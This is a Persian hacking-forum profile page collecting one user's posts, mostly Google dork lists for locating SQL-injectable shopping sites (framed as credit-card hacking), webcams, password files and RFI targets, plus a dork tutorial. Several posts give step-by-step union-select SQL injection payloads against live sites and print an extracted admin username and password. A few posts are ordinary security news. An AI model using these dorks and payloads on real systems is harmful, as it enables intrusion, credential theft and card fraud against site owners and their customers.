رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

Mr_007

کاربر تازه‌وارد
  • ارسال ها

    155
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    10

تمامی موارد ارسال شده توسط Mr_007

  1. Dork Carding – دورک های جدید برای هک کارت های اعتباری ( Master Card – Visa Card – …. ) checkout.asp?UserID= checkout.asp?cartid= checkout.cfm?UserID= checkout.cfm?cartid= checkout.php?UserID= checkout.php?cartid= checkout1.asp?cartid= checkout1.cfm?cartid= checkout1.php?cartid= checkout_confirmed.asp?order_id= checkout_confirmed.cfm?order_id= checkout_confirmed.php?order_id= db/CART/product_details.asp?product_id= db/CART/product_details.php?product_id= eshop.php?id= estore/products.php?cat= garden_equipment/Fruit-Cage/product.asp?pr= garden_equipment/Fruit-Cage/product.php?pr= garden_equipment/pest-weed-control/product.asp?pr= garden_equipment/pest-weed-control/product.php?pr= getbook.asp?bookid= getbook.cfm?bookid= getbook.php?bookid= giftDetail.asp?id= giftDetail.cfm?id= giftDetail.php?id= giftshop/product.php?proid= global/product/product.asp?gubun= global/product/product.php?gubun= goods_detail.asp?data= goods_detail.php?data= goods_detail.php?goodsIdx= inurlrod_detail.php?id= inurlrod_detail.php?id= inurlrod_info.php?id= inurlrod_info.php?id= inurlroduct-item.php?id= inurlroduct-item.php?id= inurlroduct.php?id= inurlroduct.php?id= inurlroduct_ranges_view.php?ID= inurlroduct_ranges_view.php?id= inurlroductdetail.php?id= inurlroductdetail.php?id= inurlroductinfo.php?id= inurlroductinfo.php?id= inurlroduit.php?id= inurlroduit.php?id= inurl:shop.php?do=part&id= inurl:shop.php?do=part&id= inurl:shop_category.php?id= inurl:shopping.php?id= inurl:shopping.php?id= inurl:view_product.php?id= inurl:view_product.php?id= irbeautina/product_detail.asp?product_id= irbeautina/product_detail.php?product_id= item.asp?eid= item.asp?id= item.asp?iid= item.asp?item_id= item.asp?itemid= item.asp?model= item.asp?prodtype= item.asp?shopcd= item.asp?sub_id= item.cfm?eid= item.cfm?item_id= item.cfm?itemid= item.cfm?model= item.cfm?prodtype= item.cfm?shopcd= item.php?SKU= item.php?cat= item.php?code= item.php?eid= item.php?id= item.php?iid= item.php?item= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item.php?sub_id= item/detail.php?num= item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page= itemDesc.asp?CartId= itemDesc.cfm?CartId= itemDesc.php?CartId= item_book.asp?CAT= item_book.php?CAT= item_details.asp?catid= inurl:".php?cat=" intext:"shopping" inurl:".php?cat=" intext:"add to cart" inurl:".php?cat=" intext:"Buy Now" inurl:".php?cat=" intext:"View cart" inurl:".php?cat=" intext:"boutique" inurl:".php?cat=" intext:"/store/" inurl:".php?cat=" intext:"/shop/" inurl:".php?cat=" intext:"Toys" inurl:".php?catid=" inurl:".php?catid=" intext:"View cart" inurl:".php?catid=" intext:"Buy Now" inurl:".php?catid=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys" inurl:".php?categoryid="
  2. در یکی از اشتباهات محرز تاریخی، پسورد 98 میلیون کاربر روس پس از هک شدن لو رفت. پرتال بزرگ روسی به نام Rambler.ru به عنوان جدیدترین قربانی دنیای هک با اشتباه محرز ادمین خود روبرو شد، چراکه پسورد 98 میلیون کاربر در یک فایل plaintext ذخیره شده بود که با لو رفتن این فایل از روی دیتابیس اطلاعات کاربران هک شد. هک دیتابیس مشتریان این پرتال که سرویس دهنده ایمیل نیز هست شامل حساب کاربری، آدرس ایمیل، دیتای شبکه های اجتماعی و پسورد کاربران می شود که همگی در یک فایل تکست به صورت رمزگذاری نشده ذخیره شده بود و بدین معناست که هرکسی به راحتی قادر به دیدن پسوردها است. آخرین بار هک سایت VK.com و سرقت 171 میلیون حساب کاربری در روسیه رسانه ای شد و حالا سایت رامبلر در کنار لینکداین، last.fm و مای اسپیس قرار می گیرد که دیتابیس آن ها نیز موردحمله هکری قرارگرفته و دچار آسیب شده اند. گفتنی است سایت Rambler.ru در سال 1996 تأسیس شد و یکی از بزرگ ترین سایت های اینترنتی جهان است که داخل روسیه رقیب بزرگی برای یاندکس و mail.ru به شمار می رود. منبع: خبرآنلاین
  3. وب امروز با آموزش دورک نویسی و ساخت دورک در گوگل هکینگ در خدمت شما دوستان هستم این آموزش اختصاصی گارد ایران هست و کپی با ذکر منبع مشکلی نداره :دی خو بریم سراغ آموزش شما در دورک با شش گزینه معمولا مواجه میشید که من این شش گزینه رو توضیح میدم 1) Intitle : 2) Filetype : 3) Site : 4) Related 5) Inurl : 6)Intext : این پنج گزینه در اول هر دورک میان Intitle : خوب گزینه یک که Intitle هست رو توضیح میدم خوب اگر شما دنبال کلمه ای در متن title سایت میخواین جستو جو کنید از Intitle : استفاده کنید مثال: Intitle : Hacking. Intitle : Security. Intitle : guardiran.org خوب با جست و جوی این کلمات در گوگل به این شکل که در مثال گفته شده خودتون متوجه موضوع میشید. خوب گاهی پیش میاد که که شما میخواین یک سایت خاص یا دامین خاص مثال .ir - .org - .net -.com و .... جست و جو کنید در این مواقع از دستور Site: استفاده میکنیم مثال میخوایم کلمه هک رو در سایت گارد ایران جست و جو کنیم دورک ما به این شکل میشه intext:هک site:guardiran.org یا میخواین کلمه هک رو فقط در دامین های .ir جست و جو کنید دورک ما به این شکل میشه InText:هک Site:.ir خوب در دورک های بالا شما یه دستور دیگه میبینید به اسم Intext که فکر کنم متوجه کارش شده باشید این دستور در متن سایت ها جست و جو میکنه دستور بعدی Filetype هست از اسمش هم معلومه کارش چیه این دستور یک فایل خاص رو برای شما جست و جو میکنه مثال شما میخواین در سایت گارد ایران دنبال فایل pdf بگردید دورک ما به شکل زیر میشه Site:guardiran.org Filetype: PDF شما با دستور FileType میتونید فایل هایی مثل mp3 - pdf - docs & ... رو جست و جو کنید filetype : ppt Security filetype : pdf security filetype : doc Intitle: "security" etc مجموعه دورک برای پیدا کردن دوربین مدار بسته inurl: view/index.shtml. intitle:liveapplet intitle:axis intitle:"video server" intitle:"EvoCam" inurl:"webcam.html" intitle:"Live NetSnap Cam-Server feed" intitle:"Live View / - AXIS 206M" intitle:"Live View / - AXIS 206W" intitle:"Live View / - AXIS 210" inurl: indexframe.shtmlaxis. intitle:"Live View / - AXIS" intitle:"WJ-NT104 Main Page" intitle:snc-z20 inurl:home/ intitle:snc-cs3 inurl:home/ intitle:snc-rz30 inurl:home/ intitle:"sony network camera snc-p1" viewnetcam.com intitle:"Toshiba Network Camera" user login intitle:"i-Catcher Console-Webmoniter". نمونه ای از دورک های گوگل هکینگ Dorks for finding usernames and passwords: auth_user_file.txt Gives you list of crackable passwords “login: *” “password: *” filetype: xls Gives passwords file in saved in excel filetype:log inurl:”password .log” Clear text password files Dorks for finding Credit cards: “ATM PIN” ReZult Credit card dumps by phishers Dorks for MYSQL dumps: ?intitle:index.of?”.mysql_history Gets you the MySQL history files Input validation vulnerabilities: intext:”Powered by X-Cart: shopping cart software” -site:x-cart.com به زودی اموزش ویدیوی ای قرار خواهد گرفت امید وارم از این آموزش کمال استفاده رو برده باشید تشکر فراموش نشه : دی
  4. Private Dorks [ Gaming | Shopping ] details.php?id=1189&ed=97 ksjs.asp?PageNo=73 embed.php?id=158668149 main.php?g2_itemId=49924 Fanfiction?v=created article_show.php?id=8085 news_detail.php?slug=corporates-need-for-more-professionalisation-in-events-sector blog.php?type=cat&blog_cat_id=11' and [t] and '1'='1 page_10780.php?id=1479244 resultaction.jsp?Page=1 ?id=248 ?action=userposts&userid=945134 cdprint.php?id=196_0_3_0 CourseDetails.aspx?CourseID=13191008 mspeed?whoami=1&w query.php?pg=principal&action=results&poll_ident=84 default3.asp?ID=29 gour_book.php?id=220 wnytourn.php?sp=Baseball' and [t] and '1'='1 itemdy00.aspx?ID=34,1122&T1=T16074 subcat.php?cid=4&sid=139 ?gosearch=Go&q=developer&searchCategory=&searchType=jobs&title= album.php?id=6&page=2 content.php?catoid=17&navoid=844 womens-tommy-hilfiger-list_br144?ptclass=glp&ref_brand=144&ref_bootheight=Knee High details.php?id=20' and [t] and '1'='1 server.pt?open=514&objID=1592549&mode=2 watch.php?vid=b5da9cc55 get_image.php?id=1160114 product_detail.php?prod_id=66 sp?aff=1109&catid=16030469 product.php?productid=21492 ?hop=nitroburn&search=Pthc expo.php?&id_expo=82 case2.php?mode=show_doc&doc_id=668097&newver=2 runner.php?IM=7363046754504. product.php?product_no=11&main_cate_no=4&display_group=1 Counter-Strike-Source?filter_by=title&keyword=zombie discogartist.php?artistid=459 player.php?id=195 Default.aspx?treeid=59&oid=2693 listings.php?cat_id=3&furnished=Yes hy-news-detail.htm?id=5589
  5. Dork for Sqli ~ Gaming Fatal Frame (complete).php?id= Fatal Frame II: Director's Cut (complete).php?id= FIFA Soccer 06 (complete).php?id= FIFA Soccer 07 (complete).php?id= FIFA Street 2 (complete).php?id= Fight Club (complete).php?id= Fight Night 2004 (complete).php?id= Flat Out (complete).php?id= Ford Mustang (complete).php?id= Ford Racing 2 (complete).php?id= Ford Racing 3 (complete).php?id= Ford Vs. Chevy (complete).php?id=
  6. Shoping Sqli Dorks inurl:".php?cid=" intext:"shopping" inurl:".php?cid="+intext:"online+betting" inurl:".php?id=" intext:"/shop/" inurl:".php?id=" intext:"/store/" inurl:".php?id=" intext:"Buy Now" inurl:".php?id=" intext:"View cart" inurl:".php?id=" intext:"add to cart" inurl:".php?id=" intext:"boutique" inurl:".php?id=" intext:"shopping" inurl:".php?id=" intext:"toys" inurl:".php?pid=" inurl:".php?pid=" intext:"Buy Now" inurl:".php?pid=" intext:"View cart" inurl:".php?pid=" intext:"add to cart" inurl:".php?pid=" intext:"boutique" inurl:".php?pid=" intext:"shopping
  7. تا کاربران در معرض خطر سرقت شدن اطلاعات و حملات فیشینگ قرار بگیرند. بن هالپرن (Ben Hepern)، یکی از توسعه دهنده های زبان های رابی و جاوا اسکریپت، علت به وجود آمدن آسیب پذیری مذکور را ویژگی های به کار رفته در target بیان کرده و گفت: «زمانی که یک وبگاه از target=_blank برای باز کردن یک لینک در یک زبانه یا پنجره ی جدید استفاده می کند، برای دسترسی به پنجره ی جدید از رابط برنامه نویسی نرم افزار " window.opener API" استفاده کرده و دسترسی های محدودی را به دست می آورد. این دسترسی ها تعدادی از محدودیت های دامنه ی متقابل را حذف می کنند.» از لحاظ نظری یک هکر می تواند با استفاده از صفت های انتقال به یک صفحه ی جدید، کدهای مخربی را در صفحه ی وبی که در یک پنجره یا زبانه ی تازه باز می شود، قرار بدهند. سپس زمانی که کاربر روی لینک قرارگرفته در صفحه ی مبدأ کلیک می کند، یک پنجره ی جدید باز شده و شروع به برگزاری می شود. در همین زمان، کدهای مخرب فعالیت خود را آغاز و با استفاده از صفت یاد شده یک صفحه ی فیشینگ را (به عنوان مثال در صفحه ی مبدأ) ایجاد می کند. هم اکنون فیس بوک تحت تأثیر آسیب پذیری مذکور در تمام مرورگرها قرار می گیرد. این درحالی است که شبکه ی اجتماعی توییتر تنها در زمان استفاده از مرورگر سافاری تحت تأثیر قرار گرفته و اینستاگرام به صورت کامل این آسیب پذیری را بر طرف کرده است. هالپرن با بیان این که هکرها می توانند از طریق روش مذکور به سرقت اطلاعات کاربران بپردازند، گفت: «زمانی که یک حمله ی فیشینگ با استفاده از این روش صورت می گیرد، هکر از طریق صفحه ی جدید باز شده، به صفحه ی اصلی دسترسی دائمی پیدا می کند و می تواند به راحتی اطلاعات خصوصی کاربر را سرقت کند.» طراحان وبگاه ها باید برای بر طرف کردن آسیب پذیری ذکر شده، صفت «rel=noopener» را به تمام لینک هایی که از «target=_blank» استفاده می کنند اضافه کنند. اگرچه مرورگر فایرفاکس از صفت یاد شده پشتیبانی نکرده و برای رفع آسیب پذیری در این مرورگر باید از «rel=noopener noreferrer» استفاده شود. منبع: سایبربان
  8. محققان موفق به کشف بدافزار DressCode در 40 اپلیکیشن اندروید موجود در گوگل پلی شده اند. پیش بینی می شود این اپلیکیشن های آلوده توسط 500 هزار تا 2 میلیون کاربر دانلود شده باشند. این اپلیکیشن ها از ماه آوریل سال 2016 روی گوگل پلی بارگذاری شده بود. کارشناسان امنیتی شرکت چک پوینت (Check Point)، ادعا می کنند این بدافزار، اپلیکیشن های آلوده را به سرورهای پراکسی و بات نت تبدیل می کند. بات نت ها بوسیلۀ هکرها برای کنترل ابزارهای متصل به اینترنت به منظور توزیع لینک های کلاه برداری و باج افزارها، استفاده می شوند. ظرفیت هر بات نت به سایز آن بستگی دارد و در مورد بدافزار مذکور هدف تنها ایجاد ترافیک IP مجازی برای استفادۀ هکرها و وب گاه های شخص سوم اپلیکیشن های مذکور بوده است. زمانی که اپلیکیشن آلوده روی تلفن همراه اندرویدی نصب شود، بدافزار با سرور ارتباط برقرار می کند. سرور مربوط بلافاصله به بدافزار دستور می دهد به حالت خاموش باقی بماند تا زمانی که سرور دستور تبدیل ابزار به ساکس پراکسی و ایجاد ترافیک را صادر کند. این بدافزار همچنین می تواند به هکرها اجازۀ دسترسی به شبکه های متصل به تلفن همراه را نیز بدهد. با استفاده از این روش هکرها می توانند به سرقت اطلاعات دست زده و یا سیستم امنیتی سازمان ها را دچار اختلال کنند. منبع: باشگاه خبرنگاران جوان
  9. Mr_007

    تارگت های Sql Injection

    تارگت [Hidden Content]
  10. چنتا دورک برای هک چت روم . ببخشین اگه کمه intitle:ET-Chat v3.0.7 - Login inurl:/styles/admin_tpl/ inurl /install/ inurl /?InstallIndex
  11. Mr_007

    تارگت های Sql Injection

    درود تارگت: [Hidden Content] تعداد تیبل: [Hidden Content]+order+by+1-- با این وجود مشخصه که تیبل آسیب پذیر هم همین 1 هست تیبل های داخل تیبل آسیب پذیر ما: [Hidden Content]+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()-- خب الان برای ما مهم تیبل administrators است کالومن های داخل تیبل: [Hidden Content]+union+select+group_concat(column_name)+from+information_schema.columns+where+table_name=CHAR(97,%20100,%20109,%20105,%20110,%20105,%20115,%20116,%20114,%2097,%20116,%20111,%20114,%20115)-- خب میبینیم که admin_users و admin_password این جاست بیرون کشیدن یوزر و پس از داخل دوتا کالومن: [Hidden Content]+union+select+group_concat(admin_username,0x3a,admin_password)+from+administrators-- یوزر و پسورد: jc:Mos3s حالا فقط کافیه که صفحه ورود ادمین رو پیدا کنید تا مراحل نفوذ ما کامل بشه من که نتونستم پیداش کنم
  12. Mr_007

    تارگت های Sql Injection

    TARGET: [Hidden Content] USER & PASS: [Hidden Content],2,3,4,group_concat(emailaddr,0x3a,pw,0x3c62723e),6%20from%20users--
  13. Mr_007

    تارگت های Sql Injection

    TARGET: [Hidden Content] USER & PASS: [Hidden Content],GROUP_concat(char(60,98,114,62),username,0x3a,password),3,4+from+user
  14. Mr_007

    تارگت های Sql Injection

    TARGET: [Hidden Content] USER & PASS: [Hidden Content],2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12%20from%20user--
  15. باشگاه خبرنگاران جوان؛ اگر تاکنون گوشی های آیفون و یا آیپد های خود را آپدیت نکرده اید، همین الان این کار را انجام دهید و سیستم عامل iOS 9.3.5 را بر روی دستگاه های خود نصب کنید. برای این کار به قسمت setting رفته براساس مراحل زیر عمل کنید: Settings > General > Software Update براساس گزارشی که توسط وب سایت مشیبل منتشر شد؛ کاربرانی که این آپدیت را انجام نمی دهند در معرض خطر جدی هک شدن قرار می گیرند؛ یک بد افزار مخفی که می تواند خودش بر روی دستگاه شما نصب شود، تمام اطلاعات شما را به صورت مخفیانه به سرقت می برد. این بد افزار حتی قادر است بدون اینکه رد پایی از خودش بر جای گذارد، از روی دستگاه های کاربران اپل uninstall و یا غیر فعال شود. روز پنج شنبه دو گزارش از نیویورک تایمز و مادربرد منتشر شد که نشان می داد چگونه سه حفره امنیتی بزرگ که در آپدیت جدید برطرف شده اند، می توانند توسط هکر ها مورد سوء استفاده قرار گیرند و تمام اطلاعات شخصی شما را از روی دستگاه های دارای سیستم عامل ios بین برند.
  16. در ماه های گذشته چندین انفجار و آتش سوزی در مچتمع های پتروشیمی جنوب کشور رخ داد. هم زمانی این اتفاقات با خبر کشف بدافزارهایی در سیستم های تاسیساتی پتروشیمی در کشور باعث ایجاد این تصور شد که شاید ارتباطی میان آلوده شدن سیستم ها به نوعی ویروس و انفجار مخازن پتروشیمی وجود داشته باشد. با این حال به نظر می رسد چنین تصوری چندان صحیح نباشد. با سخت افزار همراه باشید. به گزارش رویترز و به نقل از خبرگزاری ایرنا، مسئولان امنیتی پتروشیمی ایران موفق به کشف و نابود کردن دو بدافزار مخرب در تاسیسات پتروشیمی شده اند. به گفته مقامات امنیتی، این بدافزارها در فاز غیر فعال قرار داشته و نقشی در ایجاد آتش سوزی های اخیر نداشته اند. سرتیپ غلامرضا جلالی، رئیس سازمان پدافند غیر عامل ایران، در توضیحاتی که در این زمینه توسط ایرنا منتشر شده اند عنوان کرده است که اقدامات لازم برای جلوگیری از انجام هر گونه عملیات خرابکارانه توسط این بدافزارها صورت گرفته است. تاسیسات حیاتی ایران در سال های اخیر به شدت مورد حمله گروه های وابسته به دولت های خارجی قرار داشته اند. از جمله این اتفاقات می توان به آلوده شدن بخشی از تاسیسات هسته ای کشور به ویروس استاکس نت اشاره کرد که باعث بروز برخی خسارات در سامانه های غنی سازی ایران شده بود و سپس کشف و خنثی شد. هفته گذشته نیز وزیر نفت یکی از دلایل بروز این آتش سوزی ها را، کاهش بودجه امنیت و نظارت از سوی شرکت های خصوصی فعال در این بخش اعلام کرده بود.
  17. rfi dork intitle:"Joomla - Web Installer" intitle:"LOGREP - Log file reporting system" -site:itefix.no intitle:"Multimon UPS status page" intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php ) intitle:"PhpMyExplorer" inurl:"index.php" -cvs intitle:"statistics of" "advanced web statistics" intitle:"System Statistics" +"System and Network Information Center" intitle:"urchin (5|3|admin)" ext:cgi intitle:"Usage Statistics for" "Generated by Webalizer" intitle:"wbem" compaq login "Compaq Information Technologies Group" intitle:"Web Server Statistics for ****" intitle:"web server status" SSH Telnet intitle:"Welcome to F-Secure Policy Manager Server Welcome Page" /main.php?page= /default.php?page= /index.php?action= /index1.php?p= /index2.php?x= /index2.php?content= /index.php?conteudo= /index.php?cat= /include/new-visitor.inc.php?lvc_include_dir= /modules/agendax/addevent.inc.php?agendax_path= /shoutbox/expanded.php?conf= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /pivot/modules/module_db.php?pivot_path= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /zentrack/index.php?configFile= /main.php?x= /becommunity/community/index.php?pageurl= /GradeMap/index.php?page=
  18. sql 2014 very new3 bout.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.php?ID= catalog_main.php?catid= category.php category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID= checkout_confirmed.php?order_id=
×
×
  • ایجاد مورد جدید...